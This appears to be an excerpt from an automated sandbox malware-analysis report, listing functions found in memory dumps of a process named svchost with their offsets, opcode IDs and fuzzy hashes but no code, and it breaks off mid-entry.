                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                            • Instruction ID: 91c37f0ba8076008ccebf34710c73a99192e1493555dc1f27d2b366501c43c9f
                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                            • Instruction Fuzzy Hash: C9310732A04244AFDB21DB68CC44B9AFFF9FF45350F0885ABE855DB351D674A844CBA0
                                            Function 03A59274 Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b20980e25f55a32faa56c6de298ff1685e3a4589dd3fd19363150c15c00d0785
                                            • Instruction ID: c1a608a8e716a2defa4559a10c55687a07381f7245e1b33901e01bf14dec8919
                                            • Opcode Fuzzy Hash: b20980e25f55a32faa56c6de298ff1685e3a4589dd3fd19363150c15c00d0785
                                            • Instruction Fuzzy Hash: DC314275A00328EFDB21DB24CD40B9BB7B9AF85760F55019EB94DAB380DB309E448B51
                                            Function 03A35702 Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 85b1584032fba150422f2ef6af11059dc0812b7c552f82e51ddfbf8546a1b94e
                                            • Instruction ID: caf1a03fe6c60628a0dd6fc9f079145a43c22c04453db36417d2087b7fbf7f56
                                            • Opcode Fuzzy Hash: 85b1584032fba150422f2ef6af11059dc0812b7c552f82e51ddfbf8546a1b94e
                                            • Instruction Fuzzy Hash: B131CE35701A02FFDB55DB28CA80A99FBA9BF46354F04456BE8019BB50DB70E820CBD0
                                            Function 03A34260 Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d094bcd91e6f5b04b4608259ca810b4c4d3347fedabf7c6c4b16d72ee756281a
                                            • Instruction ID: 7c6777e45114ee2b259e7384b5f4b27839a0686d70650b4eff9e356f0f0f83d7
                                            • Opcode Fuzzy Hash: d094bcd91e6f5b04b4608259ca810b4c4d3347fedabf7c6c4b16d72ee756281a
                                            • Instruction Fuzzy Hash: 9C41AF75100B449FDB26CF29C981BD6BBE9AB4A354F04442FF6999F650C774E804CB50
                                            Function 03A550E4 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                            • Instruction ID: f51081b46c23124f23162288773496e556541b234bf98df6a3c0a99c3cdb2721
                                            • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                            • Instruction Fuzzy Hash: A631D431A083419BEB21EB28C800767BAE5BF86754F0C856FFD868B381D274D841C7A2
                                            Function 03AF61C3 Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a348b358dc08d9d8c7de24184ab9d6e1d3c38354b5f8742a355c3e05f5e97f6b
                                            • Instruction ID: 297e22d965ddef2e6cdf14a63723d190725b401a867a90b1fb916ccdd228f55d
                                            • Opcode Fuzzy Hash: a348b358dc08d9d8c7de24184ab9d6e1d3c38354b5f8742a355c3e05f5e97f6b
                                            • Instruction Fuzzy Hash: 9331A176E00215EFDB19DF98CD80BAEB7B9EB48740F49416AF500AB254D774ED01CB94
                                            Function 03A29730 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ccdc5aa702bdf0825e4e9bad97c5211f6034481d7c483179a266647fb8e7703
                                            • Instruction ID: af420130cf843bbcfcf03bbe6508a1615216b530627310d86487e7881dd52406
                                            • Opcode Fuzzy Hash: 0ccdc5aa702bdf0825e4e9bad97c5211f6034481d7c483179a266647fb8e7703
                                            • Instruction Fuzzy Hash: E421C17AA00B20AFC321EF58C500B1BBFB5FB85B54F15046EE9699B740D770E811CBA0
                                            Function 03AF6BD7 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c8d9305d39b6f576c26170394a0df4607d0ef141741020f24c5b9962ed265b3d
                                            • Instruction ID: 441ad80234f9b85874db4fddd785552d8e70c6a0a34f7ed4df09092a6c3b1ad2
                                            • Opcode Fuzzy Hash: c8d9305d39b6f576c26170394a0df4607d0ef141741020f24c5b9962ed265b3d
                                            • Instruction Fuzzy Hash: 39316D316002049FCB24DF6AD9C5A5B7BF4FF49344F8585AAF908DF249D270E945CBA4
                                            Function 03AF60B8 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd8fefc32f358eee74250669a6c2a53541df8e2ff009ff38f824f3f7a0eb921c
                                            • Instruction ID: 5d4d80e6c21f5fba64785222863cb5c12074057b723899b21c9226861e9434ac
                                            • Opcode Fuzzy Hash: bd8fefc32f358eee74250669a6c2a53541df8e2ff009ff38f824f3f7a0eb921c
                                            • Instruction Fuzzy Hash: 2B31E235B00215AFDB22EBA9CD40B6EBBB9AB84354F0445BAF645DB361DA30DD008B94
                                            Function 03A307AF Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e5d71fa833a8d1c85d93ce40ea508961437422530057e66c6a80456ce13a7350
                                            • Instruction ID: 5136f9f8b664ba176c1beb75b89ca9d0b0bdac83ff35c779946e7b4587a3bd15
                                            • Opcode Fuzzy Hash: e5d71fa833a8d1c85d93ce40ea508961437422530057e66c6a80456ce13a7350
                                            • Instruction Fuzzy Hash: DE31A076A04751DBC711EF28C980E6BBBA5EF86760F05496BFC569B310DA30DC1187E1
                                            Function 03A2D6AA Relevance: .1, Instructions: 93COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                            • Instruction ID: eb43a35771edbffaabd0076309aedc849f8faa4c50c487ebd9d563ab6e2ac006
                                            • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                            • Instruction Fuzzy Hash: 1931E336A00A24AFDB21DF5CC980B2ABBB9DB81710F1D846FED259B242D338DD40CB50
                                            Function 00403500 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 381137cc63e19a0dfd8f3f77c609d0f2726de8f2368368eca18099cd814eadd1
                                            • Instruction ID: aaee96ca111a170f09a570f45fcba96346b043729a9e1ea6d102aee89ca14d62
                                            • Opcode Fuzzy Hash: 381137cc63e19a0dfd8f3f77c609d0f2726de8f2368368eca18099cd814eadd1
                                            • Instruction Fuzzy Hash: 1531A2B2A14A109FD378CE6DD845617B7E5AB88310B418B2EE89AD7790D778ED01CBC4
                                            Function 03A357C0 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f857d78d7158342fd077451c557b50127f55c0307c9fc97317628e47e034ca1
                                            • Instruction ID: 70ea2c1dc56c1e3ad4a3de7320778ec72efa835459b3db9d7361008fcc8a7484
                                            • Opcode Fuzzy Hash: 3f857d78d7158342fd077451c557b50127f55c0307c9fc97317628e47e034ca1
                                            • Instruction Fuzzy Hash: 66318339B15A05FFDB51DB24DA40A59BBA5FF46354F4490ABE9018BB50D731E831CBC0
                                            Function 03A6A6C7 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                            • Instruction ID: 44fd35d0e12f29d0f4970963481795f8dd9f28c962e129b4cbbeb5da9d8c92c8
                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                            • Instruction Fuzzy Hash: 033128B2B00B00AFD760CF69DE41B57B7F8AB09A50F08092EA59AD3650E730E900CB64
                                            Function 03A5438F Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 663a37088795cf2c3b3e837922d66265ba1aeb4edf4038e2b67683f210b208fc
                                            • Instruction ID: 9c84c3cef76a2a9b52a5f8459333ef394efc3a95333ed19f0e86abd975400cbe
                                            • Opcode Fuzzy Hash: 663a37088795cf2c3b3e837922d66265ba1aeb4edf4038e2b67683f210b208fc
                                            • Instruction Fuzzy Hash: 8D31D631B403059FDB24EFA9C980B6FB7F9AB98305F00852BE945E7654D770E985CB50
                                            Function 03A392C5 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                            • Instruction ID: 41f29a22330a59c21a04975728f2cca3478fb6dcd4e2fe8ab7c2f222da2ba32f
                                            • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                            • Instruction Fuzzy Hash: 3E316BB56083499FCB01DF18D980A5ABBE9EF89350F04096EF9519B3A1D734DC14CBA2
                                            Function 03A87190 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                            • Instruction ID: 8496094d4679e3b686f4be02aba5f420f422d013868d0591c44310e954c57651
                                            • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                            • Instruction Fuzzy Hash: 65318A75604206CFC710DF18C480956FBF5FF89350B2986AEE9589B325EB31ED46CB91
                                            Function 03AEC3CD Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                            • Instruction ID: b3f6e7d3d8c8a3883213dff33af035c1f032d0e2f1a715ff1d47f1c30f62f4ac
                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                            • Instruction Fuzzy Hash: C3210B3F600755A6CB14EBA58D44ABBF7B4EF50620F40841BFD668B792E634D950C360
                                            Function 03A2C156 Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10441682143ff2e10de1f0fbafad119bfaf6e13f04ad73d989a75c3fd091e69e
                                            • Instruction ID: 63f5049d048da65b0ce98542e13307ed5445b2d683e46318757187c724efc1c0
                                            • Opcode Fuzzy Hash: 10441682143ff2e10de1f0fbafad119bfaf6e13f04ad73d989a75c3fd091e69e
                                            • Instruction Fuzzy Hash: CB31E8755003108BCB31FF28CD41BA9B7B4AF41314F5885AEE8459F3C1DA78D985CB90
                                            Function 03A2E388 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                            • Instruction ID: 6be498ffc77f99da7f20357187ce17bdcc4030ce99e742110f029f2edc085d95
                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                            • Instruction Fuzzy Hash: B6319835600614EFDB25DF68C984F6ABBB9EF84354F1449AAE5128B790E730EE42CB50
                                            Function 03B003E6 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca4fc2d2057f2b721026d9e3821c641e589cdf5e38f45c9aa7b9859f06b89267
                                            • Instruction ID: 842f19eb48e24731352997c2f9350ca748b29e7c628d8a17d6c6e99c31b900b6
                                            • Opcode Fuzzy Hash: ca4fc2d2057f2b721026d9e3821c641e589cdf5e38f45c9aa7b9859f06b89267
                                            • Instruction Fuzzy Hash: A1316671B00115AFCB14EBA5D994F9FBBB9FF88208F414179E905E7240DB306E04CB94
                                            Function 03AAE609 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 58dd213ab21fb46d9b8acd6897de6e4894a9185fffbe7e827717063445c7144f
                                            • Instruction ID: 5414556288cea4aca77af54bd0584462f8baaf486434672ffbac3bb4c914b861
                                            • Opcode Fuzzy Hash: 58dd213ab21fb46d9b8acd6897de6e4894a9185fffbe7e827717063445c7144f
                                            • Instruction Fuzzy Hash: 3231A076A00605DFCB14CF1CC884EAEB7B6FF88304B15495AF8099B390E775EA41CB90
                                            Function 03A33616 Relevance: .1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a512ea7c77e36fa44f0a9791b17442934fba15b4d4c98502007f78b92335f0d4
                                            • Instruction ID: e82ca08e98a277a2a833a2383085bda930f6a61556bc48cd8c53f5a5139baf80
                                            • Opcode Fuzzy Hash: a512ea7c77e36fa44f0a9791b17442934fba15b4d4c98502007f78b92335f0d4
                                            • Instruction Fuzzy Hash: 9021D4392497509FCB61DF04CA44B2ABBA4EF82B14F09056EF8450B7A1C7B4DC44CB81
                                            Function 03B00591 Relevance: .1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f996f56f7e18af1709c04f8104eed9d81abd0e8ce6b4e7374b6f01a7499018d
                                            • Instruction ID: 9b92ea5652eec92414f08be214399c4127a8bee0d9253d5814bdf9d0c5776272
                                            • Opcode Fuzzy Hash: 3f996f56f7e18af1709c04f8104eed9d81abd0e8ce6b4e7374b6f01a7499018d
                                            • Instruction Fuzzy Hash: 6721F3326002058FD728DE29C880BBABBA6EFD4308F5945B8E905CB2C5D730F845C750
                                            Function 03A5F32A Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                            • Instruction ID: 776df0fbfa74df8bb085ee9a9a24d65ac25c63c8521db731e0b29bba83dc814f
                                            • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                            • Instruction Fuzzy Hash: 37219D72200300DFD719DF15C545B6ABBF9EFA5365F15816EE91A8B3A0EBB0E801CB94
                                            Function 03AB06F1 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 505861c4915b04f2863257ddab4115b3c054bc400dc3252a8b1146e6799410e6
                                            • Instruction ID: 35dabd07cad794f77d1305b6b6fb5542d963e8ac63f654862c33f5943f086e1e
                                            • Opcode Fuzzy Hash: 505861c4915b04f2863257ddab4115b3c054bc400dc3252a8b1146e6799410e6
                                            • Instruction Fuzzy Hash: 06218D75A00629ABCF20DF59C981ABFF7F8FF49740B54006AE541AB241D778AD52CBA0
                                            Function 03AB019F Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4394f00247f787b554161ca54f03d8e85f3f4b4577b6125826e06ed32b0efdf6
                                            • Instruction ID: ead4f6dccd50184d9fe44f6895c31d9cb99c59526c4c7772cf63b4d90afd4fc4
                                            • Opcode Fuzzy Hash: 4394f00247f787b554161ca54f03d8e85f3f4b4577b6125826e06ed32b0efdf6
                                            • Instruction Fuzzy Hash: F721BC75600604AFCB15DB68D980F6AB7B8FF88740F14016AF944DB7A1D738ED50CBA8
                                            Function 03AB0283 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d0e53e777885b1d2ca7fde7633ab3e0860f28b5d5fb482448331dac3c712cfe
                                            • Instruction ID: 02ab7f6b5abb7ad43a892a62fba816729fb9701e8973191bc19f537efc0a1226
                                            • Opcode Fuzzy Hash: 5d0e53e777885b1d2ca7fde7633ab3e0860f28b5d5fb482448331dac3c712cfe
                                            • Instruction Fuzzy Hash: 0721B0729043459BC711EF69C948BABF7FCBF81240F08455BBD80CB292D734D948C6A2
                                            Function 03AD71F9 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f9a7c00cc92fa43c14c654dfc1b8f7e6e7d7632cc008b57d54ee1a349aeecc7
                                            • Instruction ID: c8cc6152edefe1855bd3dbef3f5c3104ed435eac425c76c8f4c07d1921548f1b
                                            • Opcode Fuzzy Hash: 4f9a7c00cc92fa43c14c654dfc1b8f7e6e7d7632cc008b57d54ee1a349aeecc7
                                            • Instruction Fuzzy Hash: 34212831A047908FC32CDF658940B2BB7E9EFC1314F14496FF8A787250CB71A9858791
                                            Function 03AAD0C0 Relevance: .1, Instructions: 73COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                            • Instruction ID: c699146f45b4bb1a427ab309b04656c33923b4e7aedf325ee4dc2aa737b0d378
                                            • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                            • Instruction Fuzzy Hash: 8321B072644B00ABD311DF1CCC51B5BBBB4EB89720F04052FF9859B7A0D730D90187A9
                                            Function 03B001AA Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7e7540d6b35ae0773defcbfdf58532279f93a25ff1c4da5357d5f6d1b62e69a
                                            • Instruction ID: 2f69d4ba6420ce59ad5e1e369c31798c21275ad31b46d0ff109f90485169308d
                                            • Opcode Fuzzy Hash: a7e7540d6b35ae0773defcbfdf58532279f93a25ff1c4da5357d5f6d1b62e69a
                                            • Instruction Fuzzy Hash: 4D21E4612042504FE745CB1A88B44B6BFE5EFD6229B0982E6D8C4CB346C135D907C7B0
                                            Function 03A6A30B Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 70d0f84faab431c625d840ca31eed989c339b15e834d3396036205dd3872479d
                                            • Instruction ID: fcda52dc117d75957cee4c037bd19ced99529df4bbe9c78f20a5036528925e5d
                                            • Opcode Fuzzy Hash: 70d0f84faab431c625d840ca31eed989c339b15e834d3396036205dd3872479d
                                            • Instruction Fuzzy Hash: FC217F7A200B119FC725DF29C901B56B7F5AF48704F1884AAA519DBB61E371E842CF94
                                            Function 03A2B765 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 92d2e8cde5494efff6856a8dc7afe75558ac7ffe81cf384827968c51bb13822e
                                            • Instruction ID: 7538c14602a77caacf4f70c10952b4d8e2efa8e27f4860091f3245760eb7770d
                                            • Opcode Fuzzy Hash: 92d2e8cde5494efff6856a8dc7afe75558ac7ffe81cf384827968c51bb13822e
                                            • Instruction Fuzzy Hash: FB217C36100710DFC722EF58CA40F59BBF5FF58708F144A6EE0099BAA1C774A814CB54
                                            Function 03AFEE26 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
